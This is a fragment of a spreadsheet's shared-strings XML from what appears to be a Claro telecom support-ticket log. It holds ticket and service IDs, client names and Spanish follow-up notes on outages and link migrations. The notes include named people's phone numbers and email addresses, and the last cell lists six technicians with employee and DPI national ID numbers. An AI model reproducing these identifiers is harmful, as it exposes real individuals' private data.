    <t>METALGRAFICA</t>
  </si>
  <si>
    <t>F4545401</t>
  </si>
  <si>
    <t>544600002T</t>
  </si>
  <si>
    <t>F4546117</t>
  </si>
  <si>
    <t>1665011OH</t>
  </si>
  <si>
    <t>F4544980</t>
  </si>
  <si>
    <t>F4545896</t>
  </si>
  <si>
    <t>F4540496</t>
  </si>
  <si>
    <t>F4543512</t>
  </si>
  <si>
    <t>F4543438</t>
  </si>
  <si>
    <t>ID1028486SV</t>
  </si>
  <si>
    <t>F4544959</t>
  </si>
  <si>
    <t>452887ON</t>
  </si>
  <si>
    <t>F4544960</t>
  </si>
  <si>
    <t>F4544836</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0007</t>
  </si>
  <si>
    <t>F4544961</t>
  </si>
  <si>
    <t>F4540735</t>
  </si>
  <si>
    <t>IP2204096SV</t>
  </si>
  <si>
    <t>F4544962</t>
  </si>
  <si>
    <t>F4544771</t>
  </si>
  <si>
    <t>FG9344G</t>
  </si>
  <si>
    <t>F4546073</t>
  </si>
  <si>
    <t>F4546352</t>
  </si>
  <si>
    <t>F4546214</t>
  </si>
  <si>
    <t>F4544119</t>
  </si>
  <si>
    <t>F4543768</t>
  </si>
  <si>
    <t>F4541790</t>
  </si>
  <si>
    <t>F4541130</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000314</t>
  </si>
  <si>
    <t>F4546215</t>
  </si>
  <si>
    <t>IP2383020SV</t>
  </si>
  <si>
    <t>BANCO SALVADORE?O</t>
  </si>
  <si>
    <t>IP2025149SV</t>
  </si>
  <si>
    <t>F4539264</t>
  </si>
  <si>
    <t>F4542425</t>
  </si>
  <si>
    <t>CC_PRONE_GT_KM274_FRONTERAS_IZABAL_LIVINGSTON</t>
  </si>
  <si>
    <t>90001907043T</t>
  </si>
  <si>
    <t>727100018T</t>
  </si>
  <si>
    <t>90001800635T</t>
  </si>
  <si>
    <t>F4540924</t>
  </si>
  <si>
    <t>F4542494</t>
  </si>
  <si>
    <t>F4539582</t>
  </si>
  <si>
    <t>F4532049</t>
  </si>
  <si>
    <t>F4539086</t>
  </si>
  <si>
    <t>F4539353</t>
  </si>
  <si>
    <t>F4542427</t>
  </si>
  <si>
    <t>IP2145227SV</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_025</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0443</t>
  </si>
  <si>
    <t>1720097OH</t>
  </si>
  <si>
    <t>OH1001076603</t>
  </si>
  <si>
    <t>F4543864</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_EL_PALMAR</t>
  </si>
  <si>
    <t>IP2031260SV</t>
  </si>
  <si>
    <t>F4540025</t>
  </si>
  <si>
    <t>F4539579</t>
  </si>
  <si>
    <t>F4540705</t>
  </si>
  <si>
    <t>F4540467</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0808</t>
  </si>
  <si>
    <t>F4541156</t>
  </si>
  <si>
    <t>F4539563</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_RIO_SANTIAGO</t>
  </si>
  <si>
    <t>F4544099</t>
  </si>
  <si>
    <t>ID1049000SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE SAN RAFAEL OBRAJUELO</t>
  </si>
  <si>
    <t>F4545908</t>
  </si>
  <si>
    <t>519000008T</t>
  </si>
  <si>
    <t>F4543367</t>
  </si>
  <si>
    <t>F4540923</t>
  </si>
  <si>
    <t>671900127T</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_AGENCIA_462</t>
  </si>
  <si>
    <t>527100007T</t>
  </si>
  <si>
    <t>F4543371</t>
  </si>
  <si>
    <t>F4545910</t>
  </si>
  <si>
    <t>758500325T</t>
  </si>
  <si>
    <t>IP2041078SV</t>
  </si>
  <si>
    <t>F4541843</t>
  </si>
  <si>
    <t>22677300SV</t>
  </si>
  <si>
    <t>JC SEWING SUPPLY S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4543789</t>
  </si>
  <si>
    <t>297401497T</t>
  </si>
  <si>
    <t>F4540650</t>
  </si>
  <si>
    <t>22065900SV</t>
  </si>
  <si>
    <t>INDUSTRIAS E IMPRESOS LA UNION S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4544832</t>
  </si>
  <si>
    <t>710905OH</t>
  </si>
  <si>
    <t>F4545004</t>
  </si>
  <si>
    <t>F4542595</t>
  </si>
  <si>
    <t>F4539735</t>
  </si>
  <si>
    <t>F4542372</t>
  </si>
  <si>
    <t>F4543869</t>
  </si>
  <si>
    <t>897605OH</t>
  </si>
  <si>
    <t>F4545289</t>
  </si>
  <si>
    <t>F4546172</t>
  </si>
  <si>
    <t>F4544110</t>
  </si>
  <si>
    <t>F4543338</t>
  </si>
  <si>
    <t>F4545292</t>
  </si>
  <si>
    <t>F4541264</t>
  </si>
  <si>
    <t>F4544101</t>
  </si>
  <si>
    <t>812500001T</t>
  </si>
  <si>
    <t>VENTAS UNIDAS, S.A</t>
  </si>
  <si>
    <t>47502293T</t>
  </si>
  <si>
    <t>359400016T</t>
  </si>
  <si>
    <t>COOPERATIVA DE AHORRO Y CREDITO Y SERVICIOS VARIOS SANTIAGO DE COATEPEQUE R.L.</t>
  </si>
  <si>
    <t>673000012T</t>
  </si>
  <si>
    <t>F4544102</t>
  </si>
  <si>
    <t>FH3053</t>
  </si>
  <si>
    <t>10500004T</t>
  </si>
  <si>
    <t>944900007T</t>
  </si>
  <si>
    <t>F4545215</t>
  </si>
  <si>
    <t>366900001T</t>
  </si>
  <si>
    <t>ILUMINARTE, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4540896</t>
  </si>
  <si>
    <t>F4539177</t>
  </si>
  <si>
    <t>90001911082T</t>
  </si>
  <si>
    <t>F4539515</t>
  </si>
  <si>
    <t>1056612OH</t>
  </si>
  <si>
    <t>ID1169005SV</t>
  </si>
  <si>
    <t>F4541874</t>
  </si>
  <si>
    <t>IP2421002SV</t>
  </si>
  <si>
    <t>F4544542</t>
  </si>
  <si>
    <t>F4539179</t>
  </si>
  <si>
    <t>303100001T</t>
  </si>
  <si>
    <t>F4541071</t>
  </si>
  <si>
    <t>861700003T</t>
  </si>
  <si>
    <t>PRONTO, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4543546</t>
  </si>
  <si>
    <t>F4541097</t>
  </si>
  <si>
    <t>CONTR0002088505OC</t>
  </si>
  <si>
    <t>4986357ON</t>
  </si>
  <si>
    <t>F4540355</t>
  </si>
  <si>
    <t>90001904240T</t>
  </si>
  <si>
    <t>546300001T</t>
  </si>
  <si>
    <t>COMBI S.A.</t>
  </si>
  <si>
    <t>F4541869</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_LA_ESPERANZA</t>
  </si>
  <si>
    <t>F4539930</t>
  </si>
  <si>
    <t>F4541148</t>
  </si>
  <si>
    <t>F4545384</t>
  </si>
  <si>
    <t>F4541185</t>
  </si>
  <si>
    <t>F4542146</t>
  </si>
  <si>
    <t>F4541878</t>
  </si>
  <si>
    <t>1193576OH</t>
  </si>
  <si>
    <t>F4543630</t>
  </si>
  <si>
    <t>90001910420T</t>
  </si>
  <si>
    <t>F4543415</t>
  </si>
  <si>
    <t>ID1026345SV</t>
  </si>
  <si>
    <t>READY TO FLY EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4539933</t>
  </si>
  <si>
    <t>F4539339</t>
  </si>
  <si>
    <t>F4545209</t>
  </si>
  <si>
    <t>F4545816</t>
  </si>
  <si>
    <t>697300001T</t>
  </si>
  <si>
    <t>EMERGIA</t>
  </si>
  <si>
    <t>F4541255</t>
  </si>
  <si>
    <t>F4539009</t>
  </si>
  <si>
    <t>F4541895</t>
  </si>
  <si>
    <t>47503281T</t>
  </si>
  <si>
    <t>F4540101</t>
  </si>
  <si>
    <t>344400601T</t>
  </si>
  <si>
    <t>F4540100</t>
  </si>
  <si>
    <t>F4539362</t>
  </si>
  <si>
    <t>F4546220</t>
  </si>
  <si>
    <t>17400459T</t>
  </si>
  <si>
    <t>29500082T</t>
  </si>
  <si>
    <t>22632010SV</t>
  </si>
  <si>
    <t>GRUPO LOS HEROES S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4542006</t>
  </si>
  <si>
    <t>F4542007</t>
  </si>
  <si>
    <t>860200003T</t>
  </si>
  <si>
    <t>678000005T</t>
  </si>
  <si>
    <t>85700014T</t>
  </si>
  <si>
    <t>SCENTIA PERFUMERIA</t>
  </si>
  <si>
    <t>407800015T</t>
  </si>
  <si>
    <t>NEGOCIOS DE CONSUMO S.A.</t>
  </si>
  <si>
    <t>F4545541</t>
  </si>
  <si>
    <t>F4542278</t>
  </si>
  <si>
    <t>F4541597</t>
  </si>
  <si>
    <t>F4545310</t>
  </si>
  <si>
    <t>90001909781T</t>
  </si>
  <si>
    <t>362200005T</t>
  </si>
  <si>
    <t>DIARIOS MODERNOS S.A.</t>
  </si>
  <si>
    <t>F4546337</t>
  </si>
  <si>
    <t>F4541749</t>
  </si>
  <si>
    <t>1673938OH</t>
  </si>
  <si>
    <t>F4542537</t>
  </si>
  <si>
    <t>469300001T</t>
  </si>
  <si>
    <t>SERVICIOS TURISTICOS VALLE S.A.</t>
  </si>
  <si>
    <t>F4542541</t>
  </si>
  <si>
    <t>F4542540</t>
  </si>
  <si>
    <t>F4541310</t>
  </si>
  <si>
    <t>F4541311</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0707</t>
  </si>
  <si>
    <t>F4545617</t>
  </si>
  <si>
    <t>F4545616</t>
  </si>
  <si>
    <t>MP131401001SSV</t>
  </si>
  <si>
    <t>90001901796T</t>
  </si>
  <si>
    <t>IP2051001SV</t>
  </si>
  <si>
    <t>F4541314</t>
  </si>
  <si>
    <t>F4546033</t>
  </si>
  <si>
    <t>F4546034</t>
  </si>
  <si>
    <t>F4546024</t>
  </si>
  <si>
    <t>F4546038</t>
  </si>
  <si>
    <t>F4546039</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_EL_TREBOL</t>
  </si>
  <si>
    <t>F4543103</t>
  </si>
  <si>
    <t>F4545769</t>
  </si>
  <si>
    <t>F4545494</t>
  </si>
  <si>
    <t>CC_INGENIO_MONTEROSA_NI_CASA_MATRIZ_CHINANDEGA</t>
  </si>
  <si>
    <t>F4543605</t>
  </si>
  <si>
    <t>F4542504</t>
  </si>
  <si>
    <t>F4542505</t>
  </si>
  <si>
    <t>CC_GYT_GT_PLAZA_CONCEPCION</t>
  </si>
  <si>
    <t>629300001T</t>
  </si>
  <si>
    <t>EMBAJADA DE CUBA</t>
  </si>
  <si>
    <t>F4545676</t>
  </si>
  <si>
    <t>F4541425</t>
  </si>
  <si>
    <t>F4539398</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_ATM_DDJ_SANTA_ANA</t>
  </si>
  <si>
    <t>F4542407</t>
  </si>
  <si>
    <t>F4546100</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0019</t>
  </si>
  <si>
    <t>F4546107</t>
  </si>
  <si>
    <t>625900204T</t>
  </si>
  <si>
    <t>CONTR0001504210OC</t>
  </si>
  <si>
    <t>F4541848</t>
  </si>
  <si>
    <t>F4542392</t>
  </si>
  <si>
    <t>FMN062J</t>
  </si>
  <si>
    <t>47502337T</t>
  </si>
  <si>
    <t>F4542625</t>
  </si>
  <si>
    <t>885400002T</t>
  </si>
  <si>
    <t>ENVASADO EN LINEA, S.A.</t>
  </si>
  <si>
    <t>F4546428</t>
  </si>
  <si>
    <t>804100004T</t>
  </si>
  <si>
    <t>TERNIUM INTERNACIONAL GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4546425</t>
  </si>
  <si>
    <t>F4541910</t>
  </si>
  <si>
    <t>F4544013</t>
  </si>
  <si>
    <t>292900261T</t>
  </si>
  <si>
    <t>930979OH</t>
  </si>
  <si>
    <t>OH1000764567/TSK ENERGIA HONDURAS SA DE CV -</t>
  </si>
  <si>
    <t>F4542315</t>
  </si>
  <si>
    <t>F4542318</t>
  </si>
  <si>
    <t>ID1049002SV</t>
  </si>
  <si>
    <t>F4542313</t>
  </si>
  <si>
    <t>F4542314</t>
  </si>
  <si>
    <t>562800001T</t>
  </si>
  <si>
    <t>F4542497</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_RIBERA_DEL_RIO</t>
  </si>
  <si>
    <t>F4541958</t>
  </si>
  <si>
    <t>IP2135044SV</t>
  </si>
  <si>
    <t>802700073T</t>
  </si>
  <si>
    <t>F4542319</t>
  </si>
  <si>
    <t>F4539429</t>
  </si>
  <si>
    <t>F4539430</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_BODEGA_LOS_ALAMOS</t>
  </si>
  <si>
    <t>90001911283T</t>
  </si>
  <si>
    <t>F4542181</t>
  </si>
  <si>
    <t>F4544410</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_MIXCO_Z1</t>
  </si>
  <si>
    <t>F4545945</t>
  </si>
  <si>
    <t>F4542732</t>
  </si>
  <si>
    <t>F4546046</t>
  </si>
  <si>
    <t>F4546047</t>
  </si>
  <si>
    <t>F4542410</t>
  </si>
  <si>
    <t>341200007T</t>
  </si>
  <si>
    <t>F4542373</t>
  </si>
  <si>
    <t>F4542374</t>
  </si>
  <si>
    <t>F4546405</t>
  </si>
  <si>
    <t>830300006T</t>
  </si>
  <si>
    <t>F4545005</t>
  </si>
  <si>
    <t>509200007T</t>
  </si>
  <si>
    <t>EL CAOBA S.A.</t>
  </si>
  <si>
    <t>F4540930</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_LOS_AMATES_036</t>
  </si>
  <si>
    <t>F4544419</t>
  </si>
  <si>
    <t>344400019T</t>
  </si>
  <si>
    <t>F4546423</t>
  </si>
  <si>
    <t>F4539171</t>
  </si>
  <si>
    <t>1158385OH</t>
  </si>
  <si>
    <t>1516494OH</t>
  </si>
  <si>
    <t>F4539467</t>
  </si>
  <si>
    <t>F4539806</t>
  </si>
  <si>
    <t>1672418OH</t>
  </si>
  <si>
    <t>894900027T</t>
  </si>
  <si>
    <t>364100075T</t>
  </si>
  <si>
    <t>ID1025118SV</t>
  </si>
  <si>
    <t>F4543548</t>
  </si>
  <si>
    <t>90001911208T</t>
  </si>
  <si>
    <t>F4541991</t>
  </si>
  <si>
    <t>F4545355</t>
  </si>
  <si>
    <t>90001910641T</t>
  </si>
  <si>
    <t>F4540800</t>
  </si>
  <si>
    <t>F4545251</t>
  </si>
  <si>
    <t>630496ON</t>
  </si>
  <si>
    <t>ID1028583SV</t>
  </si>
  <si>
    <t>799100001T</t>
  </si>
  <si>
    <t>STARLINE INTERNACIONAL, -GM SEGURIDAD</t>
  </si>
  <si>
    <t>F4541560</t>
  </si>
  <si>
    <t>39200062T</t>
  </si>
  <si>
    <t>F4540905</t>
  </si>
  <si>
    <t>IP2024306SV</t>
  </si>
  <si>
    <t>F4546209</t>
  </si>
  <si>
    <t>F4546420</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T_09</t>
  </si>
  <si>
    <t>F4542025</t>
  </si>
  <si>
    <t>47503478T</t>
  </si>
  <si>
    <t>528599ON</t>
  </si>
  <si>
    <t>F4541180</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4080</t>
  </si>
  <si>
    <t>5165807ON</t>
  </si>
  <si>
    <t>F4543999</t>
  </si>
  <si>
    <t>90001902444T</t>
  </si>
  <si>
    <t>F4545253</t>
  </si>
  <si>
    <t>F4541969</t>
  </si>
  <si>
    <t>F4542564</t>
  </si>
  <si>
    <t>F4542751</t>
  </si>
  <si>
    <t>F4541562</t>
  </si>
  <si>
    <t>F4544896</t>
  </si>
  <si>
    <t>970513OH</t>
  </si>
  <si>
    <t>OH1000782216/DISTRIBUIDORA CUMMINS C A HONDURAS S DE R L  DISTRIBUIDORA CUMMINS C A HONDURAS S DE R L</t>
  </si>
  <si>
    <t>90001910353T</t>
  </si>
  <si>
    <t>F4544900</t>
  </si>
  <si>
    <t>297401501T</t>
  </si>
  <si>
    <t>F4540672</t>
  </si>
  <si>
    <t>F4539345</t>
  </si>
  <si>
    <t>292900031T</t>
  </si>
  <si>
    <t>F4539681</t>
  </si>
  <si>
    <t>F4541856</t>
  </si>
  <si>
    <t>F4544006</t>
  </si>
  <si>
    <t>F4545405</t>
  </si>
  <si>
    <t>F4541979</t>
  </si>
  <si>
    <t>268100008T</t>
  </si>
  <si>
    <t>CORPORACION CIFUENTES S.A.</t>
  </si>
  <si>
    <t>F4545314</t>
  </si>
  <si>
    <t>242800007T</t>
  </si>
  <si>
    <t>VICLASA, S.A.</t>
  </si>
  <si>
    <t>5313490ON</t>
  </si>
  <si>
    <t>F4540522</t>
  </si>
  <si>
    <t>F4544038</t>
  </si>
  <si>
    <t>F4546513</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0222</t>
  </si>
  <si>
    <t>F4541813</t>
  </si>
  <si>
    <t>F4543601</t>
  </si>
  <si>
    <t>F4540523</t>
  </si>
  <si>
    <t>IP2134069SV</t>
  </si>
  <si>
    <t>F4542679</t>
  </si>
  <si>
    <t>F4541993</t>
  </si>
  <si>
    <t>F4542257</t>
  </si>
  <si>
    <t>CONTR0002088692OC</t>
  </si>
  <si>
    <t>F4544450</t>
  </si>
  <si>
    <t>F4544997</t>
  </si>
  <si>
    <t>F4544941</t>
  </si>
  <si>
    <t>F4543299</t>
  </si>
  <si>
    <t>IP2165058SV</t>
  </si>
  <si>
    <t>F4544698</t>
  </si>
  <si>
    <t>F4541968</t>
  </si>
  <si>
    <t>F4542032</t>
  </si>
  <si>
    <t>F4543552</t>
  </si>
  <si>
    <t>F4543733</t>
  </si>
  <si>
    <t>F4544011</t>
  </si>
  <si>
    <t>691200001T</t>
  </si>
  <si>
    <t>DIVERSIONES INFANTILES, S.A.</t>
  </si>
  <si>
    <t>F4546091</t>
  </si>
  <si>
    <t>F4539802</t>
  </si>
  <si>
    <t>ID1204026SV</t>
  </si>
  <si>
    <t>90001902583T</t>
  </si>
  <si>
    <t>F4542287</t>
  </si>
  <si>
    <t>F4543329</t>
  </si>
  <si>
    <t>23277100SV</t>
  </si>
  <si>
    <t>5222728ON</t>
  </si>
  <si>
    <t>F4545923</t>
  </si>
  <si>
    <t>F4545784</t>
  </si>
  <si>
    <t>F4542035</t>
  </si>
  <si>
    <t>323900001T</t>
  </si>
  <si>
    <t>DCASA S.A.</t>
  </si>
  <si>
    <t>F4543289</t>
  </si>
  <si>
    <t>265900398T</t>
  </si>
  <si>
    <t>22335300SV</t>
  </si>
  <si>
    <t>C RENTA S.A DE C.V</t>
  </si>
  <si>
    <t>483300008T</t>
  </si>
  <si>
    <t>INTERAMERICAN DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4543279</t>
  </si>
  <si>
    <t>F4542154</t>
  </si>
  <si>
    <t>F4543080</t>
  </si>
  <si>
    <t>944900004T</t>
  </si>
  <si>
    <t>F4544936</t>
  </si>
  <si>
    <t>F4542879</t>
  </si>
  <si>
    <t>F4544694</t>
  </si>
  <si>
    <t>F4544696</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4705</t>
  </si>
  <si>
    <t>CC_WALMART_GT_MIXCO_Z8</t>
  </si>
  <si>
    <t>F4540526</t>
  </si>
  <si>
    <t>F4544339</t>
  </si>
  <si>
    <t>509200008T</t>
  </si>
  <si>
    <t>90001801737T</t>
  </si>
  <si>
    <t>F4541776</t>
  </si>
  <si>
    <t>CC_FEDERACION_COOPERATIVAS_GT_INTERNET_TOTONICAPAN</t>
  </si>
  <si>
    <t>F4543067</t>
  </si>
  <si>
    <t>F4546329</t>
  </si>
  <si>
    <t>617800053T</t>
  </si>
  <si>
    <t>Total 4</t>
  </si>
  <si>
    <t xml:space="preserve"> ABRIL 2022</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>TIKET F4216908
CLIENTE CORPORACION MERINO
DIRECCIÓN 22 CALLE 9-33 ZONA 16, PASEO CAYALA
ESCALACIÓN AREA COMERCIAL GT
4/4 JOSE FERNANDO ROMERO 58260956 209 DIAS 19 HORAS  10:00 HRS
SEGUIMIENTO ACTUAL: NO SE TIENE SEGUIMIENTO, SE CONSULTA CON EJECUTIVO MAYNOR MARROQUIN, COMENTA QUE EL RECUERDA QUE EL CASO ESTABA A LA ESPERA DE COMENTARIO DE RODOLFO ESTRADA, SIN EMBARGO SE LE INDICA QUE SEGUN INFORMACIÓN SERVICIO ESTA PENDIENTE DE MIGRAR A LA RED DE CLARO Y DE MIGRACIÓN DE MEDIO, CASO EN BANDEJA DE COMERCIAL INDICA PENDIENTE DE INGRESAR PREVENTA POR SAC, AUN SIN AVANCAS YA QUE NO SE TIENE PRESUPUESTO PARA LA INSTALACION DE LOS RADIOS NUEVOS.
4/4 @JOSE FERNANDO ROMERO 58260956 214 DÍAS 11 HORAS</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON LUIS MARTÍNEZ/CLIENTE 32668167 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>CASO ESCALADO CON PERSONAL DE OPERACIONES DE LA REGIÓN PARA TRABAJAR LA MIGRACIÓN DEL SERVICIO, SE PIDE DE NUEVO A CNOC CLARO VÍA SKYPE QUE NOS INCLUYAN EN LA COLA DE CORREOS.</t>
  </si>
  <si>
    <t>SE DETIENEN PROCESOS SERVICIO ACTIVO</t>
  </si>
  <si>
    <t>CRONOS ANTERIORES INDICAN SEGUIMIENTO CON ÁREA COMERCIAL MAÑANA A LAS 12:00PM</t>
  </si>
  <si>
    <t>SE ESCALÓ CON DARLING ALVAREZ/EJECUTIVA 58261315 PIDE SE LE BRINDE LA DIRECCIÓN EXACTA PARA QUE ELLA PUEDA APOYARNOS, CALL CENTER NO VA INCLUÍDA EN LA COLA DE CORREOS, SE PIDE A GESTIÓN N1/CNOC CLARO VÍA SKYPE QUE NOS COPIEN.</t>
  </si>
  <si>
    <t>SE LLAMA A EJECUTIVA RAQUEL CIFUENTES - 58263996 NO RESPONDE
-ID 3001086092</t>
  </si>
  <si>
    <t>SE LLAMA A EJECUTIVO GABRIEL BAUTISTA - 58260474 MENCIONA QUE NO ES EL EJECUTIVO DE LA CUENTA, BRINDA EL CONTACTO DE EJECUTIVA RAQUEL CIFUENTES - 58263996
-ID 3001084953</t>
  </si>
  <si>
    <t>ÁREA COMERCIAL YA INGRESÓ PROYECTO 5478871 PARA CAMBIO DE MEDIO, NUEVO ID 8902760, SEGUIMIENTO:
16/06/2022 12:46:10 ( LFERNANDO.LOPEZ)
BUENA TARDE
UN GUSTO SALUDARLES, QUISIERA SOLICITAR DE SU APOYO CON PERMISOS PARA REALIZAR LA VISITA DE IMPLEMENTACIÓN DE EQUIPOS EL DÍA 21/06 EN HORARIO DE 8 A 5</t>
  </si>
  <si>
    <t>-* SE HABLA CON LOIDA CIFUENTES 58263996  (EJECUTIVA) INFORMA QUE YA SE INGRESARON LOS PROYECTOS PARA EL CAMBIO, EL NUEVO ID ES  8902760, SE NOTIFICA A PERSONAL DE CNOC -*
-*</t>
  </si>
  <si>
    <t>SE LLAMÓ A EJECUTIVA CLARO 58263996 PARA SEGUIMIENTO, NO CONTESTA; SE LE ENVÍA CORREO CONSULTÁNDOLE SEGUIMIENTO:
ASUNTO: RE: F4425142|| ID 8901859T || BANRURAL ||REDUNDACIA WIMAX CALZADA ROOSEVELT 13-46 ZONA 7</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BERNABE TORRES 40713148 MENCIONA QUE CONTINUA A LA ESPERA POR PARTE DE SUS EJECUTIVOS PARA LOS PERMISOS
-ID 2001095208</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BERNABE TORRES AL 40713148 INDICA QUE AUN NO HAY RESPUESTA QUE LO ESTA VIENDO JUNTO CON LOS EJECUTIVOS VICTOR HUGO Y SILVIA  Y ELLOS QUEDARON EN  DARLE RESPUESTA HOY POR LA TARDE O MAÑANA VIERNES YA QUE ELLOS SE ESTARAN COMUNICADO CON EL COCODE RESPECTO A LOS PERMISOS Y EL NOS ESTARA INFORMANDO CUANDO TENGA RESPUESTA**
ID 2001006636
**</t>
  </si>
  <si>
    <t>***--- SE RETROALIMENTA A CL INDICANDO QUE VALIDE SI VE OPERATIVIDAD EN EL SERVICIO. --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 26 DE JUNIO DE 2022 04:31
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: G227 - ENLACE CLARO - CON ID 629100048T, ESTATUS CAÍDO.
BUENOS DÍAS ESTIMADO SR. REYES.
                CONTINUANDO CON EL SEGUIMIENTO, PERSONAL A CARGO NOS INDICA QUE EL SERVICIO SE ENCUENTRA ACTUALMENTE ACTIVO.
PODRÍA APOYARNOS EN VALIDAR EL FUNCIONAMIENTO DESDE SU LADO.
CUALQUIER CONSULTA QUEDAMOS ALA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SERVICIO EN PROCESO DE MIGRACIÓN, SEGUIMIENTO CON ÁREA COMERCIAL HASTA EL DÍA LUNES A PARTIR DE LAS 08:00AM.</t>
  </si>
  <si>
    <t>****SE LLAMA A EJECUTIVA ANA CECILIA POZUELOS AL 58260517  INDICA QUE EL CASO LO TIENE INGENIERA QUE SE DEBE DE CONSULTAR CON ELLOS COMO VA CON LA MIGRACION **
-ID 2001714487
**</t>
  </si>
  <si>
    <t>**SE LLAMA A EJECUTIVA ANA CECILIA POZUELOS AL 58262567 CONTESTA LA SEÑORITA KARLA GALVEZ INDICA QUE EL NUMERO DE ANA ES 58260517 **
-ID 2001713590
**</t>
  </si>
  <si>
    <t>TICKET F4487543
CLIENTE DISTRIBUIDORA INTERAMERICANA DE ALIMENTOS S.A.
DIRECCIÓN  INTERNET.- CALLE PRINCIPAL ALDEA JUSTO RUFINO BARRIOS OLINTEPEQUE QUETZALTENANGO
ESCALACIÓN
4/4	JOSE FERNANDO ROMERO	58260956  66 DIAS  16 HRS
ESTADO ACTUAL EN ESPERA DE CONFIRMACIÓN DE LA RENOVACIÓN DE CONTRATO Y MIGRACIÓN DE ENLACE A FO. ACTUALMENTE SE TIENE ACTIVO POR W.A. A LA ESPERA DE RETIRARLO AL MOMENTO DE TENER ENLACE UP.
TIEMPO TOTAL DE WORK  66 DIAS  16 HRS @JOSE</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO SU APOYO COORDINANDO ACCESOS CON EL BANCO
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 11 DE JUNIO DE 2022 10:34
PARA: MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;; ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; ANTHONY GARCIA &lt;AGARCIA@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;; EMERSON RENATTO ROBLES TORRES &lt;EMERSON.ROBLES@CLARO.COM.GT&gt;; DARLING ELISABET ALVAREZ IBOY &lt;DARLING.ALVAREZ@CLARO.COM.GT&gt;; ERWIN RAMIREZ &lt;ERWIN.RAMIREZ@TAV.COM.GT&gt;; OSCAR CASTILLO &lt;OSCAR.CASTILLO@TAV.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS PARA ATM0363 || F4524080 || 47500911T
BUENOS DIAS APRECIABLE CLIENTE
LE COMENTAMOS QUE NUESTRO PERSONAL TECNICO SE ENCUENTRA EN EL PUNTO REMOTO, PERO EL BANCO NO LES DA ACCESOS, SE HA TENIDO INCONVENIENTE PARA INGRESAR Y ATENDER EL CAJERO YA QUE EL BANCO NO TIENE CONOCIMIENTO DE LA FALLA, SOLICITAMOS DE SU APOYO COORDINANDO ACCESOS CON EL BANCO Y PROPORCIONARNOS NUEVA FECHA Y HORA PARA COORDINAR VISITA.
ES IMPORTANTE INGRESAR AL BANCO YA QUE SE TIENE UNA CAJA INTERNA Y DE ALLÍ SALE LA RED DE CLARO, ESTAREMOS PENDIENTES DE SUS COMENTARIOS
WALTER BARRIOS       IBM  520339       DPI 2054013331101
GERBER DONIS            IBM  550149       DPI 2086696631101
LUIS CHOJOLAN           IBM  549369       DPI 1738904660914
JOSE JULIAN                 IBM 610004        DPI 2082737511106
RAUL GUZMAN            IBM 580104        DPI 2611629771109
CESAR TUCH                 IBM  731836      DPI 2052962891105</t>
  </si>
